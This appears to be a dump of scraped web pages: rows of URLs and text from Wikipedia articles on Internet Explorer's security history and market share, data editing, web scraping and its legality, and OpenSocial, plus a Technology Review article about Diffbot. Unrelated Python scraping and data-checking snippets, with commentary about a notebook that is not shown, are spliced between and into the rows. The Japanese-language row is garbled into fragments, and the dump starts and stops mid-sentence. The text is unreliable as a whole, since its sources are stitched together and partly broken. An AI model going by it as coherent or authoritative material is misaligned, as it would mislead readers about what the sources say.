Windows Vista, XP, Server 2008, and Server 2003, IE8 on Windows 7, Vista, XP, Server 2003, and Server 2008 (R2). 101 The German government warned users against using Internet Explorer and recommended switching to an alternative web browser, due to the major security hole described above that was exploited in Internet Explorer. 102 The Australian and French Government issued a similar warning a few days later. 103 104 105 106 On April 26, 2014, Microsoft issued a security advisory relating to CVE 2014 1776 (use-after-free vulnerability in Microsoft Internet Explorer 6 through 11 107 ), a vulnerability that could allow "remote code execution" in Internet Explorer versions 6 to 11. 108 On April 28, 2014, the United States Department of Homeland Security's United States Computer Emergency Readiness Team (US-CERT) released an advisory stating that the vulnerability could result in "the complete compromise" of an affected system. 109 US-CERT recommended reviewing Microsoft's suggestions to mitigate an attack or using an alternate browser until the bug is fixed. 
110 111 The UK National Computer Emergency Response Team (CERT-UK) published an advisory announcing similar concerns and for users to take the additional step of ensuring their antivirus software is up to date. 112 Symantec, a cyber security firm, confirmed that "the vulnerability crashes Internet Explorer on Windows XP. 113 The vulnerability was resolved on May 1, 2014, with a security update. 114 The adoption rate of Internet Explorer seems to be closely related to that of Microsoft Windows, as it is the default web browser that comes with Windows. Since the integration of Internet Explorer 2.0 with Windows 95 OSR 1 in 1996, and especially after version 4.0's release in 1997, the adoption was greatly accelerated: from below 20% in 1996, to about 40% in 1998, and over 80% in 2000. This made Microsoft the winner in the infamous 'first browser war' against Netscape. Netscape Navigator was the dominant browser during 1995 and until 1997, but rapidly lost share to IE starting in 1998, and eventually slipped behind in 1999. The integration of IE with Windows led to a lawsuit by AOL, Netscape's owner, accusing Microsoft of unfair competition. The infamous case was eventually won by AOL but by then it was too late, as Internet Explorer had already become the dominant browser. Internet Explorer peaked during 2002 and 2003, with about 95% share. Its first notable competitor after beating Netscape was Firefox from Mozilla, which itself was an offshoot from Netscape. Firefox 1.0 had surpassed Internet Explorer 5 in early 2005, with Firefox 1.0 at 8 percent market share. 115 Approximate usage over time based on various usage share counters averaged for the year overall, or for the fourth quarter, or for the last month in the year depending on availability of reference. 116 117 118 119 120 121 According to StatCounter, Internet Explorer's market share fell below 50% in September 2010. 122 In May 2012, Google Chrome overtook Internet Explorer as the most used browser worldwide, according to StatCounter. 123 Browser Helper Objects are also used by many search engines companies and third parties for creating add-ons that access their services, such as search engine toolbars. Because of the use of COM, it is possible to embed web-browsing functionality in third-party applications. Hence, there are several Internet Explorer shells, and several content-centric applications like RealPlayer also use Internet Explorer's web browsing module for viewing web pages within the applications. While a major upgrade of Internet Explorer can be uninstalled in a traditional way if the user has saved the original application files for installation, the matter of uninstalling the version of the browser that has shipped with an operating system remains a controversial one. The idea of removing a stock install of Internet Explorer from a Windows system was proposed during the United States v. Microsoft Corp. case. One of Microsoft's arguments during the trial was that removing Internet Explorer from Windows may result in system instability. Indeed, programs that depend on libraries installed by IE, including Windows help and support system, fail to function without IE. Before Windows Vista, it was not possible to run Windows Update without IE because the service used ActiveX technology, which no other web browser supports. 124 125 The popularity of Internet Explorer led to the appearance of malware abusing its name. 
On January 28, 2011, a fake Internet Explorer browser calling itself "Internet Explorer Emergency Mode" appeared. It closely resembled the real Internet Explorer but had fewer buttons and no search bar. If a user attempted to launch any other browser such as Google Chrome, Mozilla Firefox, Opera, Safari, or the real Internet Explorer, this browser would be loaded instead. It also displayed a fake error message, claiming that the computer was infected with malware and Internet Explorer had entered "Emergency Mode. It blocked access to legitimate sites such as Google if the user tried to access them. 126 127 |
114 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_editing | Data editing is defined as the process involving the review and adjustment of collected survey data. 1 Data editing helps define guidelines that will reduce potential bias and ensure consistent estimates leading to a clear analysis of the data set by correct inconsistent data using the methods later in this article. 2 The purpose is to control the quality of the collected data. 3 Data editing can be performed manually, with the assistance of a computer or a combination of both. 4 Editing methods refer to a range of procedures and processes used for detecting and handling errors in data. Data editing is used with the goal to improve the quality of statistical data produced. These modifications can greatly improve the quality of analytics created by aiming to detect and correct errors. Examples of different techniques to data editing such as micro-editing, macro-editing, selective editing, or the different tools used to achieve data editings such as graphical editing and interactive editing. The term interactive editing is commonly used for modern computer-assisted manual editing. Most interactive data editing tools applied at National Statistical Institutes (NSIs) allow one to check the specified edits during or after data entry, and if necessary to correct erroneous data immediately. Several approaches can be followed to correct erroneous data: Interactive editing is a standard way to edit data. It can be used to edit both categorical and continuous data. 5 Interactive editing reduces the time frame needed to complete the cyclical process of review and adjustment. 6 Interactive editing also requires an understanding of the data set and the possible results that would come from an analysis of the data. Selective editing is an umbrella term for several methods to identify the influential errors, note 1 and outliers. note 2 Selective editing techniques aim to apply interactive editing to a well-chosen subset of the records, such that the limited time and resources available for interactive editing are allocated to those records where it has the most effect on the quality of the final estimates of published figures. In selective editing, data is split into two streams: The critical stream consists of records that are more likely to contain influential errors. These critical records are edited in a traditional interactive manner. The records in the non-critical stream which are unlikely to contain influential errors are not edited in a computer-assisted manner. 7 Data editing can be accomplished in many ways and primarily depends on the data set that is being explored. 8 The validity of a data set depends on the completeness of the responses provided by the respondents. One method of data editing is to ensure that all responses are complete in fields that require a numerical or non-numerical answer. See the example below. Verifying that the data is unique is an important aspect of data editing to ensure that all data provided was only entered once. This reduces the possibility for repeated data that could skew analytics reporting. See the example below. It is common to find outliers in data sets, which as described before are values that do not fit a model of data well. These extreme values can be found based on the distribution of data points from previous data series or parallel data series for the same data set. 
The values can be considered erroneous and require further analysis for checking and determining the validity of the response. See the example below. Logical consistency is the presence of logical relationships and interdependence between the variables. This editing requires a certain understanding around the dataset and the ability to identify errors in data based on previous reports or information. This type of data editing is used to account for the differences between data fields or variables. See the example below. There are two methods of macro editing: 7 This method is followed in almost every statistical agency before publication: verifying whether figures to be published seems plausible. This is accomplished by comparing quantities in publication tables with the same quantities in previous publications. If an unusual value is observed, a micro-editing procedure is applied to the individual records and fields contributing to the suspicious quantity. 6 Data available is used to characterize the distribution of the variables. Then all individual values are compared with the distribution. Records containing values that could be considered uncommon (given the distribution) are candidates for further inspection and possibly for editing. 9 In automatic editing records are edited by a computer without human intervention. 10 Prior knowledge on the values of a single variable or a combination of variables can be formulated as a set of edit rules which specify or constrain the admissible values Data editing has its limitations with the capacity and resources of any given study. These determinants can have a positive or negative impact on the post-analysis of the data set. Below are several determinants of data editing. 8 Available resources: 8 Available Software: 8 Data Source: 8 Coordination of Data Editing Procedure: 8 |
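The completeness, uniqueness, outlier, and logical-consistency checks described above map directly onto pandas, which this notebook already imports. A minimal sketch over made-up survey records; the column names, the 1.5 × IQR fence, and the working-age rule are illustrative assumptions, not taken from the source.

import pandas as pd

responses = pd.DataFrame({
    "respondent_id": [1, 2, 2, 3, 4],
    "age": [34, 29, 29, None, 17],
    "income": [55000, 61000, 61000, 58000, 9_900_000],
    "employed": [True, True, True, False, True],
})

# Completeness: flag records with missing required fields.
incomplete = responses[responses[["age", "income"]].isna().any(axis=1)]

# Uniqueness: flag records that appear to have been entered more than once.
duplicates = responses[responses.duplicated(subset="respondent_id", keep=False)]

# Outliers: flag values far outside the bulk of the distribution (1.5 * IQR fence).
q1, q3 = responses["income"].quantile([0.25, 0.75])
fence = 1.5 * (q3 - q1)
outliers = responses[(responses["income"] < q1 - fence) | (responses["income"] > q3 + fence)]

# Logical consistency / automatic edit rule: employed respondents should be of working age.
inconsistent = responses[responses["employed"] & (responses["age"] < 18)]

print(incomplete, duplicates, outliers, inconsistent, sep="\n\n")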
115 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#cite_ref-26 | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. 
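The fetch-then-extract cycle described above is exactly what the requests and BeautifulSoup imports at the top of this notebook are for. A minimal sketch; the URL is a placeholder, and a real scraper should also honour robots.txt, rate limits, and the site's terms of use.

import requests
from bs4 import BeautifulSoup

url = "https://example.com"  # placeholder target
response = requests.get(url, timeout=10)
response.raise_for_status()

# Parse the fetched HTML and pull out the pieces of interest.
soup = BeautifulSoup(response.text, "html.parser")
title = soup.title.get_text(strip=True) if soup.title else ""
links = [a.get("href") for a in soup.find_all("a", href=True)]

print(title)
print(links[:10])

# Many sites also expose the same data as JSON feeds, which avoids HTML parsing entirely:
# data = requests.get("https://example.com/api/items", timeout=10).json()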
A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. 
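The grep-style, regular-expression approach mentioned above can be reproduced with Python's re module, which this notebook already imports. The sample markup and patterns below are illustrative only; regexes are brittle against real-world HTML compared with a proper parser, but they work well for simple, regular pages.

import re

html = '<p>Contact <a href="mailto:press@example.com">press@example.com</a> today.</p>'

# grep-style extraction: pull every e-mail address out of the raw markup.
emails = re.findall(r"[\w.+-]+@[\w-]+\.[\w.-]+", html)

# The same idea works for attribute values such as link targets.
hrefs = re.findall(r'href="([^"]+)"', html)

print(emails)  # ['press@example.com', 'press@example.com']
print(hrefs)   # ['mailto:press@example.com']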
Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. 
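Of the tools listed above, Scrapy structures scraping as reusable spiders rather than one-off scripts; it would need a separate pip install scrapy, as it is not installed at the top of this notebook. A sketch under assumed markup: quotes.toscrape.com is a public practice site, and the CSS selectors below follow its commonly documented structure but should be verified before relying on them.

import scrapy

class QuotesSpider(scrapy.Spider):
    # Run with: scrapy runspider quotes_spider.py -o quotes.json
    name = "quotes"
    start_urls = ["https://quotes.toscrape.com/"]  # public scraping practice site

    def parse(self, response):
        # Yield one record per quote block on the page.
        for quote in response.css("div.quote"):
            yield {
                "text": quote.css("span.text::text").get(),
                "author": quote.css("small.author::text").get(),
            }
        # Follow the pagination link, if present, and parse the next page the same way.
        next_page = response.css("li.next a::attr(href)").get()
        if next_page:
            yield response.follow(next_page, callback=self.parse)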
However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA) and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's web-search software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that screen-scraping is illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, arguing that the prevailing law in this case should be US copyright law and that, under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo!, and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses, and later sued in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking were sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore the emerging pattern that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system, and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in Cvent, Inc. v. Eventbrite, Inc. in the United States District Court for the Eastern District of Virginia, the court ruled that the terms of use must be brought to the users' attention in order for a browse-wrap contract or license to be enforced. 
16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's scraping of QVC's site for real-time pricing data. QVC alleged that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 to 300 search requests to QVC's website per minute, sometimes up to 36,000 requests per minute), which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of its website, which QVC claims was caused by Resultly. On the plaintiff's web site during the period of this trial, the terms-of-use link was displayed among all the links of the site, at the bottom of the page, as on most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA), a uniform law that many believed was in favor of common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned it to the Ninth Circuit for reconsideration in light of the 2021 Supreme Court decision in Van Buren v. United States, which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld its prior decision. 23 The Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court for the Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 
26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving aside a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating terms of use that prohibit data scraping will be a violation of contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
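One widely used measure of this kind is the robots.txt exclusion standard, and a well-behaved scraper can check it and throttle its own requests before fetching pages. Below is a minimal, hedged sketch using Python's standard urllib.robotparser together with requests; the site, page path, and user-agent string are placeholders rather than real targets.
import time
from urllib.robotparser import RobotFileParser

import requests

base = "https://example.com"            # placeholder site
rp = RobotFileParser()
rp.set_url(base + "/robots.txt")
rp.read()                               # fetch and parse the site's robots.txt

url = base + "/some/page"               # placeholder page
agent = "my-scraper"                    # placeholder user-agent name
if rp.can_fetch(agent, url):            # honor the site's crawling rules
    response = requests.get(url, headers={"User-Agent": agent}, timeout=10)
    print("Fetched", url, "with status", response.status_code)
    time.sleep(2)                       # crude rate limiting between requests
else:
    print("Disallowed by robots.txt; skipping", url)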
116 | https://en.wikipedia.org/wiki/Web_scraping | https://ja.wikipedia.org/wiki/%E3%82%A6%E3%82%A7%E3%83%96%E3%82%B9%E3%82%AF%E3%83%AC%E3%82%A4%E3%83%94%E3%83%B3%E3%82%B0 | : Web scraping HTTP WWW ( : Web crawler) HTML WWW 1 API bot index nofollow PJ: P: P: |
117 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/OpenSocial | OpenSocial is a public specification that outlines a set of common application programming interfaces (APIs) for web applications. Initially designed for social network applications, it was developed collaboratively by Google, MySpace and other social networks. It has since evolved into a runtime environment that allows third-party components, regardless of their trust level, to operate within an existing web application. The OpenSocial Foundation has integrated or supported various Open Web technologies, including OAuth and OAuth 2.0, Activity Streams, and Portable Contacts. Since its inception on November 1, 2007, 1 applications that implement the OpenSocial APIs can interoperate with any social network system that supports them. OpenSocial initially adopted a universal approach to development. As the platform matured and the user base expanded, it was modularized, allowing developers to include only necessary components of the platform. 2 Orkut, a Google client, was the first to support OpenSocial. 3 On December 16, 2014, the World Wide Web Consortium (W3C) announced that the OpenSocial Foundation would transition its standards work to the W3C Social Web Activity. 4 This effectively integrated OpenSocial into the W3C’s Social Web Working Group and Social Interest Group, thereby dissolving OpenSocial as a separate entity. In its 0.9 version, OpenSocial incorporated support for a tag-based language. 6 known as OSML. This language facilitates tag-based access to data from the OpenSocial APIs, which previously necessitated an asynchronous client-side request. Additionally, it established a comprehensive tag template system and adopted an expression language that is loosely based on the Java Expression Language. From version 2.0 onwards, OpenSocial began supporting the Activity Streams format. 6 OpenSocial is commonly described as a more open cross-platform alternative to the Facebook Platform, a proprietary service of the popular social network service Facebook. 7 OpenSocial was rumored to be part of a larger social networking initiative by Google code-named "Maka-Maka", 8 9 which is defined as meaning an "intimate friend with whom one is in terms of receiving and giving freely" in Hawaiian. 10 An open-source project, Shindig, was launched in December 2007 to provide a reference implementation of the OpenSocial standards. It has the support of Google, Ning, and other companies developing OpenSocial-related software. The Myspace OpenSocial parser was released as project Negroni in January 2011 and provides a C based implementation of OpenSocial. Apache Rave is a lightweight and open-standards-based extensible platform for using, integrating, and hosting OpenSocial and W3C Widget-related features technologies, and services. It will also provide strong context-aware personalization, collaboration, and content integration capabilities and a high-quality out-of-the-box installation as well as be easy to integrate into other platforms and solutions. 11 Both Shindig and Apache Rave are no longer in development and have been retired by the Apache Foundation. Enterprise websites, such as Friendster, hi5, LinkedIn, MySpace, Orkut, and Salesforce.com are major users of OpenSocial. 12 Friendster has deployed APIs from version 0.7 of the OpenSocial specification, making it easy for existing OpenSocial applications using version 0.7 to be launched on Friendster and reach Friendster over 75 million users. 
Friendster also plans to support additional OpenSocial APIs in the coming months, including the new 0.8 APIs. 13 hi5 taps Widgetbox support for OpenSocial to get access to the choice of web widgets Widgetbox provides. 14 Myspace Developer Platform (MDP) is based on the OpenSocial API. It supports social networks to develop social and interacting widgets. It can be seen as an answer to Facebook's developer platform. 15 Initial OpenSocial support experienced vulnerabilities in security, with a self-described amateur developer demonstrating exploits of the RockYou gadget on Plaxo, and Ning social networks using the iLike gadget. 16 As reported by TechCrunch on November 5, 2007, OpenSocial was quickly cracked. The total time to crack the OpenSocial-based iLike on Ning was 20 minutes, with the attacker being able to add and remove songs on a user's playlist and access the user's friend information. 17 H sel and Iacono showed that “OpenSocial specifications were far from being comprehensive in respect to security”. 18 They discussed different security implications in the context of OpenSocial. They introduced possible vulnerabilities in Message Integrity and Authentication, Message Confidentiality, and Identity Management and Access Control. Despite the initial fanfare news coverage, OpenSocial encountered many issues initially; it only ran on the Google-owned Orkut, and only with a limited number of devices, with multiple errors reported on other devices. Other networks were still looking into implementing the framework. On December 6, TechCrunch followed up with a report by MediaPops founder Russ Whitman, who said, "While they were initially very excited, they have learned the hard way just how limited the release truly is. Russ added that "core functionality components" are missing and that "write once, distribute broadly" was not accurate. 19 Legend: Discontinued Current Changes to the REST API were made to address several issues that required changes in the OpenSocial specifications so the Open Mobile Alliance could use it.. 20 Common Containers were added that provided "a set of common services that Container developers can leverage for features like in-browser Gadget lifecycle event callbacks, Embedded Experiences, selection handlers, and action handlers. 21 A new Metadata API gives OpenSocial applications the ability to adapt to the capabilities of different OpenSocial containers. The WAP authentication extension was deprecated. OAuth 2.0 support was finalized in this version of OpenSocial. 22 OpenSocial introduced support for Activity Streams. JSON had emerged as the preferred data format and support for ATOM was deprecated. The Gadget format was simplified to give the ability to define a template library within a Gadget specification. 23 While not finalized, the groundwork for OAuth 2.0 support was put in place. In response to enterprise environment needs, OpenSocial added support for advanced mashup scenarios. It enabled gadgets to "securely message each other in a loosely coupled manner. 24 This new feature was called Inter-Gadget Communication. OpenSocial acknowledged that the "one-size-fits-all" approach it was taking was not going to work for the diverse types of websites that had adopted the platform. To address this issue, OpenSocial is modularized into four compliance modules: Core API Server, Core Gadget Server, Social API Server, and Social Gadget Server. 
2 This allowed a developer to pick and choose the modules they wanted to use while using other services that aren't part of OpenSocial. Extensions were introduced to allow developers to extend OpenSocial containers. In response to feedback and observation of how developers were using the API, this version focused on making "application development, testing, and deployment easier and faster, while reducing the learning curve for new app developers. 25 The OpenSocial Javascript API was streamlined to make it lightweight while retaining the power of the old Javascript API. Proxied content was introduced to eliminate the need for developers to work around previous AJAX limitations. Proxied content allows content to be fetched from a URL and displayed in a Content tag. In response to a common use of sending data to a remote server immediately after a request, OpenSocial 0.9.0 introduced data pipelining. Data pipelining allows the developer to specify the social data the application will need and make the data immediately available. OpenSocial Templates were introduced to create data-driven UI with a separation of markup and programmatic logic. OpenSocial Markup Language (OSML Markup) is a new set of standardized tags to accomplish common tasks or safely perform normally unsafe operations within templates. OSML is extensible. Developers can create a library of their custom tags. This minor release placed a major focus on server-to-server protocols as "the Person schema has been aligned with the Portable Contacts effort, and an optional RPC proposal has been added. 26 JSON-RPC protocol was added to increase server-to-server functionality. The RESTful protocol that was introduced in v0.8.0 underwent a large revision with several fields being added, modified, and deleted. OpenSocial changed specifications for containers to implement a RESTful API. Many of the OpenSocial Javascript API changes made this version incompatible with previous versions. Existing gadgets continued to use v0.7.0. After updating the gadget, it would use v0.8.0. Security improved with the introduction of OAuth authorization and HTML sanitation, and container lifecycle events. 27 Persistence data was stored in JSON. Released as the "first iteration that can fully support rich, social applications. 28 It added several standard fields for profile information, the ability to send a message to install an application, an Activity template to control activity notifications about what users have been doing, and a simplified persistence API to use feeds instead of global and instance-scoped application data. Another major announcement came from Apache Shindig. Apache Shindig-made gadgets are open-sourced. In coordination with this announcement, OpenSocial 0.7.0 introduced Gadget Specifications for developers to be able to define their gadgets using the Gadget API. Security was a large focus in version 0.6.0. Permission controls were tightened to prevent a gadget from returning information if it is not authorized to do so. New classes were added, such as the Environment class to allow a gadget to respond differently according to its environment and the Surface class to support navigation from one surface to another. The Activities class was simplified based on developer needs and the Stream class was deprecated. 29 Google announced the launch of OpenSocial with a pre-release of version 0.5.0. While unstable, this API introduced "various XML DTDs, Javascript interfaces and other data structures" 30 to the OpenSocial platform. |
118 | https://en.wikipedia.org/wiki/Data_scraping | https://www.technologyreview.com/2012/06/01/85817/a-startup-hopes-to-help-computers-understand-web-pages/ | No matter what language you speak, when you look at a Web page, you can get a good idea of the purpose of the different elements on it—whether they’re images, videos, text, music, or ads. It’s not so easy for machines to do the same, though. That’s where Diffbot hopes to make a difference. The startup, based in Palo Alto, California, offers application programming interfaces that make it possible for machines to “read” the various objects that make up Web pages. This could enable a publisher to repurpose the contents of pages for a mobile app, or help a startup build a price-comparison site. The company’s efforts come at a time when some tech titans are also working to add more structure to the vast amount of data on the Web. Google, for example, recently unveiled the Knowledge Graph, an effort to identify the meaning of search queries and return relevant results, rather than simply matching the text of a query with Web pages that include the same words. But these efforts usually rely on people to help by tagging Web content to infer meaning. John Davi, Diffbot’s vice president of product, says that at its heart, the company is about taking the visual learning technology that propels self-driving cars forward on a road and applying it to Web pages. The idea, which CEO and founder Mike Tung hatched several years ago while he was a graduate student at Stanford, has hummed along since last year. That’s when Diffbot rolled out an API capable of analyzing two types of Web pages on the basis of the URL. On article pages, Diffbot can pick out headlines, the text of articles, pictures, and tags; and on home pages, it can determine basic layout elements like headlines pictures, links to articles, and ads. By now, several thousand programmers are using it to analyze over 100 million URLs each month, Tung says. There are many more types of Web pages out there, though. The company believes there are roughly 18 main types, ranging from product and job pages to photo galleries. With a $2 million round of funding announced Thursday—its first following an earlier round of seed 